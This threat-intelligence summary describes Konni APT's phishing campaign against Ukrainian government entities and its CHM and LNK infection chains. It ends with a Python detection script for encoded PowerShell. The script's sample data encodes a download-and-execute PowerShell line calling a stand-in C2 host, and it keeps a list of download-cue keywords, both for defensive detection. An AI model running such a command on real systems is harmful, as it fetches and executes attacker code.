Full Report
The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating the threat actor's targeting beyond Russia. Enterprise security firm Proofpoint said the end goal of the campaign is to collect intelligence on the "trajectory of the Russian invasion." "The group's interest in Ukraine follows historical targeting
Analysis Summary
# Threat Actor: Konni APT
## Attribution & Identity
North Korea-linked threat actor.
**Known Aliases:** Opal Sleet, Osmium, TA406, Vedalia.
**Associated Groupings:** Assessed to be one of several actors comprising the activity tracked as Kimsuky, Thallium, and Konni Group (as of November 2021 analysis). Operational since at least 2014.
## Activity Summary
Konni APT has been actively engaged in cyber espionage, recently focusing on a phishing campaign targeting government entities in Ukraine. The stated end goal of this campaign is to collect intelligence on the "trajectory of the Russian invasion." This pivot follows historical targeting of Russian and South Korean government entities. The goal appears to be gathering strategic, political intelligence for North Korean leadership, rather than tactical battlefield information.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing via emails impersonating a fictitious senior fellow at a non-existent think tank (Royal Institute of Strategic Studies).
- **Payload Delivery (Variant 1):** Delivering password-protected RAR archives hosted on MEGA cloud service.
- **Execution (Variant 1):** The RAR contains a CHM file displaying decoy content (related to Valeriy Zaluzhnyi); clicking the page executes an embedded PowerShell command to download a next-stage payload.
- **Reconnaissance:** Post-compromise scripts gather system information, encode it using Base64, and exfiltrate it to the actor's server.
- **Delivery (Variant 2):** Direct distribution of an HTML attachment; clicking a link inside downloads a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file.
- **Execution (Variant 2):** The LNK file runs a Base64-encoded PowerShell command that drops a JScript Encoded file ("Themes.jse") via a VBScript. The JSE malware contacts an attacker-controlled URL and executes the response via PowerShell; the nature of the final payload is not known.
- **Credential Harvesting:** Distributing fake Microsoft security alert messages via ProtonMail to Ukrainian government entities, urging users to click embedded links to "verify" suspicious sign-in activity (warning of US-based IPs).
- **Persistence/Automation:** Creation of scheduled tasks for automatic execution (reported in related Kimsuky/TA406 activity rather than in this specific campaign).
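Both infection chains above end in PowerShell launched indirectly: by the HTML Help viewer rendering the CHM in Variant 1, and by a shortcut (with a VBScript/JSE stage run by a script host) in Variant 2. The detection logic below is an added example, not code from the report or from Proofpoint: it scans process-creation events in a simplified Sysmon Event ID 1 shape, decodes the Base64/UTF-16LE payload behind `-EncodedCommand` (and its abbreviations), and flags encoded PowerShell spawned from document handlers as well as script hosts running `.jse`/`.vbs` files from user-writable paths. The sample events, the `hh.exe` parent for CHM execution, the `example.invalid` URL and the file paths are constructed assumptions for illustration.

```python
"""Detect indirect PowerShell / script-host execution chains (added example).

Events are a simplified Sysmon Event ID 1 shape: ParentImage, Image, CommandLine.
All sample data below is constructed for this example, not real telemetry.
"""
import base64
import re


def _encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes Base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Stand-in for the actor's downloader; the URL is a reserved example domain.
STAGE2 = _encode_ps(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s2')"
)

SAMPLE_EVENTS = [
    # Variant 1: hh.exe (HTML Help viewer, assumed CHM parent) spawning encoded PowerShell
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {STAGE2}"},
    # Variant 2: LNK double-clicked in Explorer, running an encoded command
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -EncodedCommand {STAGE2}"},
    # Variant 2, later stage: script host running the dropped JSE from %TEMP%
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Local\Temp\Themes.jse"'},
    # Benign: interactive admin PowerShell, no encoded command
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoExit -Command Get-Service"},
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -en, -enc, ...) and -ec.
_ENC_SWITCHES = "|".join(re.escape("encodedcommand"[:n]) for n in range(1, 15))
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:ec|" + _ENC_SWITCHES + r")\s+([A-Za-z0-9+/=]{16,})")

# Parents from which an encoded PowerShell child is suspicious (assumed list).
DOC_HANDLERS = ("hh.exe", "explorer.exe", "winword.exe", "excel.exe", "outlook.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXT = re.compile(r"(?i)\.(?:jse|vbe|vbs|js)\b")
USER_WRITABLE = re.compile(r"(?i)\\(?:appdata|temp|tmp|downloads|public)\\")
DOWNLOAD_CUES = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|net\.webclient"
)


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Apply both rules to one event; return a list of finding dicts."""
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmd = event["CommandLine"]
    findings = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None and parent in DOC_HANDLERS:
            severity = "high" if DOWNLOAD_CUES.search(decoded) else "medium"
            findings.append({"rule": "encoded_powershell_from_document_handler",
                             "severity": severity, "parent": parent, "decoded": decoded})
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and USER_WRITABLE.search(cmd):
        findings.append({"rule": "script_host_running_user_writable_script",
                         "severity": "high", "parent": parent, "decoded": None})
    return findings


def scan(events) -> list:
    """Run evaluate() over every event and flatten the findings."""
    return [f for e in events for f in evaluate(e)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], f["parent"], (f["decoded"] or "")[:60])
```

The decode step matters more than the parent/child match: command-line telemetry shows only the Base64 blob, so a rule that decodes it can look for download-and-execute cues (`DownloadString`, `IEX`) and rank the alert accordingly, while interactive PowerShell under Explorer with no encoded command stays quiet. Sysmon must be configured to log command lines for this to work at all.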
## Targeting
- **Sectors:** Government entities.
- **Geography:** Ukraine (recent focus), Russia, South Korea, United States (historical targeting).
- **Victims:** Ukrainian government entities. Prior campaigns targeted entities involved in South Korean affairs/government.
## Tools & Infrastructure
- **Malware Families Used:** Konni RAT (aka UpDog), Themes.jse (JScript Encoded loader), RoKRAT (mentioned in relation to associated groups).
- **Infrastructure:**
- MEGA cloud service (for hosting initial archives).
- Attacker-controlled servers (for C2, payload delivery, and exfiltration).
- ProtonMail (for credential harvesting phishing emails).
- Dropbox, Yandex, pCloud (mentioned as C2 infrastructure used by associated groups like APT37/Konni).
- Compromised domains previously used for Naver credential harvesting.
## Implications
Konni APT continues to demonstrate flexibility in its operations, pivoting focus to Ukraine while maintaining its core objective of strategic intelligence gathering for North Korean leadership. The group's reliance on multi-stage infection chains built from LNK and CHM files, Base64-encoded PowerShell, script hosts, and legitimate cloud services for hosting suggests an intent to evade traditional endpoint security measures. The addition of direct credential harvesting via fake security alerts shows a parallel effort to gain account access without deploying malware at all.
## Mitigations
- Enhanced vigilance against spear-phishing, especially emails impersonating think tanks or official security alerts.
- Scrutinize attachments, particularly password-protected archives and unusual file types like CHM, LNK, and JSE files originating from external sources.
- Restrict PowerShell execution with application control, and enable PowerShell script block logging and process command-line logging so that encoded commands launched indirectly from CHM files, shortcuts, or script hosts are visible to detection.
- Review network egress traffic for outbound connections to cloud storage providers outside standard business use cases.
- Deploy multi-factor authentication (MFA) across all government accounts to mitigate credential harvesting attempts.